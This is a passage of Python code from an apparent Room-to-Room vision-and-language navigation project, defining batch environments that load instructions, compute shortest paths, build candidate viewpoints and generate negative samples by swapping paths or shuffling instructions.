if type(name) is int: # Go to the next view
self.env.sims[idx].makeAction(name, 0, 0)
else: # Adjust
self.env.sims[idx].makeAction(*env_actions[name])
perm_idx = range(len(perm_obs))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1: # -1 is the <stop> action
select_candidate = perm_obs[i]['candidate'][action]
src_point = perm_obs[i]['viewIndex']
trg_point = select_candidate['pointId']
src_level = (src_point ) // 12 # The point idx started from 0
trg_level = (trg_point ) // 12
# print(src_level, trg_level, self.env.sims[idx].getState().viewIndex, trg_point)
while src_level < trg_level: # Tune up
take_action(i, idx, 'up')
src_level += 1
while src_level > trg_level: # Tune down
take_action(i, idx, 'down')
src_level -= 1
# print('yes')
while self.env.sims[idx].getState().viewIndex != trg_point: # Turn right until the target
take_action(i, idx, 'right')
# print(self.env.sims[idx].getState().viewIndex)
assert select_candidate['viewpointId'] == \
self.env.sims[idx].getState().navigableLocations[select_candidate['idx']].viewpointId
take_action(i, idx, select_candidate['idx'])
def _teacher_action(self, obs, ended):
"""
Extract teacher actions into variable.
:param obs: The observation.
:param ended: Whether the action seq is ended
:return:
"""
a = np.zeros(len(obs), dtype=np.int64)
for i, ob in enumerate(obs):
if ended[i]: # Just ignore this index
a[i] = args.ignoreid
else:
for k, candidate in enumerate(ob['candidate']):
if candidate['viewpointId'] == ob['teacher']: # Next view point
a[i] = k
break
else: # Stop here
assert ob['teacher'] == ob['viewpoint'] # The teacher action should be "STAY HERE"
a[i] = len(ob['candidate'])
return a
def _getbatch(self):
obs = np.array(self.reset())
ended = np.array([False] * self.batch_size) # Indices match permuation of the model, not env
length = 10
obs_list = []
# obs_list.append(obs)
exp_list = []
action_list = []
for t in range(length):
candidate_batch = []
mask_batch = []
scanIds = [ob['scan'] for ob in obs]
viewpoints = [ob['viewpoint'] for ob in obs]
headings = [ob['heading'] for ob in obs]
elevations = [ob['elevation'] for ob in obs]
candidate_leng = [len(ob['candidate']) for ob in obs]
max_length = max(candidate_leng)
for i in range(max_length):
a = np.zeros(len(obs), dtype=np.int64)
mask = np.zeros(len(obs), dtype=np.int64)
for j, ob in enumerate(obs):
if i >= len(ob['candidate']):
a[j] = -1
else:
a[j] = i
mask[j] = 1
self.env.make_equiv_action(a, obs)
obs_cand = np.array(self._get_obs())
candidate_batch.append(obs_cand)
mask_batch.append(mask)
self.env.newEpisodes(scanIds,viewpoints,headings,elevations)
candidate_batch = np.array(candidate_batch).transpose() # batch x max_cand_length (obs)
mask_batch = np.array(mask_batch).transpose() # batch x max_cand_length (mask)
a_t = self._teacher_action(obs, ended)
obs_list.append(obs)
exp_list.append((candidate_batch, mask_batch))
action_list.append(np.array(a_t))
for i, next_id in enumerate(a_t):
if next_id == candidate_leng[i] or next_id == args.ignoreid: # The last action is <end>
a_t[i] = -1 # Change the <end> and ignore action to -1
if ended.all():
break
self.env.make_equiv_action(a_t, obs)
obs = np.array(self._get_obs())
ended[:] = np.logical_or(ended, (a_t == -1))
# assert len(obs_list) == len(exp_list)
return obs_list, exp_list, action_list
def getbatch(self):
res = self.q.get()
return res
class R2RBatch_P():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
if feature_store is None:
return
self.env = EnvBatch_P(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None: # Filter the wrong data
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
self.batch = None
# It means that the fake data is equals to data in the supervised setup
self.fake_data = self.data
print('R2RBatch loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def copystate(self, env):
self.env.copystate(env.env)
for name, value in vars(env).items():
if name != 'env':
setattr(self,name,value)
def copyinstance(self):
env_copy = R2RBatch(None)
for name, value in vars(self).items():
if name != 'env':
setattr(env_copy,name,value)
setattr(env_copy,'env',self.env.copyinstance())
return env_copy
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
# if shuffle:
# random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple view, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
return candidate
else:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
c_new.pop('normalized_heading')
candidate_new.append(c_new)
return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angel_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def reset_fake(self, batch=None, inject=False, **kwargs):
# ''' Load a new minibatch / episodes. '''
if self.batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
# else:
# if inject: # Inject the batch into the next minibatch
# self._next_minibatch(**kwargs)
# self.batch[:len(batch)] = batch
# else: # Else set the batch to the current batch
# self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
class R2RBatch_aug():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
self.env = EnvBatch(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None: # Filter the wrong data
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
# It means that the fake data is equals to data in the supervised setup
self.fake_data = self.data
print('R2RBatch loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
if shuffle:
random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple view, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
return candidate
else:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
c_new.pop('normalized_heading')
candidate_new.append(c_new)
return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angel_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
path = item['path']
vp = state.location.viewpointId
nxp = None
for j,p in enumerate(path[1:]):
if path[j] == vp:
nxp = p
break
if nxp is None:
nxp = path[-1]
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, nxp),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
class R2RBatch_neg():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
self.env = EnvBatch(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
self.scan_specific_data = {}
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None: # Filter the wrong data
self.data.append(new_item)
if not item['scan'] in self.scan_specific_data:
self.scan_specific_data[item['scan']] = []
self.scan_specific_data[item['scan']].append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
# self.buffered_state_dict = {}
# It means that the fake data is equals to data in the supervised setup
self.fake_data = self.data
print('R2RBatch_neg loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = deepcopy(batch)
self.start_list = []
self.dest_list = []
self.fake_start_list = []
self.fake_dest_list = []
for i,item in enumerate(self.batch):
self.start_list.append(item['path'][0])
self.dest_list.append(item['path'][-1])
path_length = len(item['path'])
scan = item['scan']
fake_flag = True
fail_flag = False
goal_list = [goal for goal in self.paths[scan][self.start_list[-1]]]
random.shuffle(goal_list)
for goal in goal_list:
if abs(path_length - len(self.paths[scan][self.start_list[-1]][goal])) < 1 and self.distances[scan][self.dest_list[-1]][goal] > 3:
self.fake_dest_list.append(self.paths[scan][self.start_list[-1]][goal])
# print('fake_dest',i)
fake_flag = False
break
if fake_flag:
fail_flag = True
# print('fake dest error')
self.fake_dest_list.append(item['path'])
fake_flag = True
goal_list = [goal for goal in self.paths[scan][self.dest_list[-1]]]
random.shuffle(goal_list)
for goal in goal_list:
if abs(path_length - len(self.paths[scan][self.dest_list[-1]][goal])) < 1 and self.distances[scan][self.start_list[-1]][goal] > 3:
self.fake_start_list.append(self.paths[scan][self.dest_list[-1]][goal])
fake_flag = False
break
if fake_flag:
fail_flag = True
# print('fake start error')
self.fake_start_list.append(item['path'])
# print('scan',scan)
if i != 0 and fail_flag:
self.batch[i] = deepcopy(self.batch[i-1])
self.start_list[-1] = self.start_list[-2]
self.dest_list[-1] = self.dest_list[-2]
self.fake_start_list[-1] = self.fake_start_list[-2]
self.fake_dest_list[-1] = self.fake_dest_list[-2]
# cnt_dest = 0
# cnt_star = 0
# scan = self.batch[i]['scan']
# item = self.batch[i]
# # print('scan after',scan)
# fake_dest_path = self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]]
# fake_star_path = self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]]
# for p in item['path']:
# if p in fake_dest_path:
# cnt_dest += 1
# if p in fake_star_path:
# cnt_star += 1
# dis_dest = self.distances[scan][item['path'][-1]][self.fake_dest_list[-1]]
# dis_star = self.distances[scan][item['path'][0]][self.fake_start_list[-1]]
# print('length',path_length,'fake dest',cnt_dest, 'fake start',cnt_star,'dis:','dest',dis_dest,'start',dis_star)
# print('ori',item['path'])
# print('des',self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]])
# print('sta',self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]])
# print('')
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
if shuffle:
random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
# long_id = "%s_%s" % (scanId, viewpointId)
# if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple view, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
# self.buffered_state_dict[long_id] = [
# {key: c[key]
# for key in
# ['normalized_heading', 'elevation', 'scanId', 'viewpointId',
# 'pointId', 'idx']}
# for c in candidate
# ]
return candidate
# else:
# candidate = self.buffered_state_dict[long_id]
# candidate_new = []
# for c in candidate:
# c_new = c.copy()
# ix = c_new['pointId']
# normalized_heading = c_new['normalized_heading']
# visual_feat = feature[ix]
# loc_heading = normalized_heading - base_heading
# c_new['heading'] = loc_heading
# angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
# c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
# c_new.pop('normalized_heading')
# candidate_new.append(c_new)
# return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angel_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
path = item['path']
vp = state.location.viewpointId
nxp = None
for j,p in enumerate(path[1:]):
if path[j] == vp:
nxp = p
break
if nxp is None:
nxp = path[-1]
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, nxp),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, type_ ='ps', **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
assert type_ in ['ps','rw']
if type_ == 'rw':
for i in range(len(self.batch)):
if i % 2 == 0:
self.batch[i]['path'] = self.fake_start_list[i]
else:
self.batch[i]['path'] = self.fake_dest_list[i]
elif type_ == 'ps':
ins_list_shuffle = []
for item in self.batch:
scan = item['scan']
ins = item['instructions']
random.shuffle(self.scan_specific_data[scan])
for _ in self.scan_specific_data[scan]:
if _['instructions'] != ins:
case = self.scan_specific_data[scan][0]
break
ins_list_shuffle.append((case['instructions'],case['instr_encoding']))
# random.shuffle(ins_list_shuffle)
for i in range(len(self.batch)):
self.batch[i]['instructions'] = ins_list_shuffle[i][0]
self.batch[i]['instr_encoding'] = ins_list_shuffle[i][1]
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
class R2RBatch_neg_bk():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
self.env = EnvBatch(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
self.scan_specific_data = {}
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None: # Filter the wrong data
self.data.append(new_item)
if not item['scan'] in self.scan_specific_data:
self.scan_specific_data[item['scan']] = []
self.scan_specific_data[item['scan']].append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
# self.buffered_state_dict = {}
# It means that the fake data is equals to data in the supervised setup
self.fake_data = self.data
print('R2RBatch_neg loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
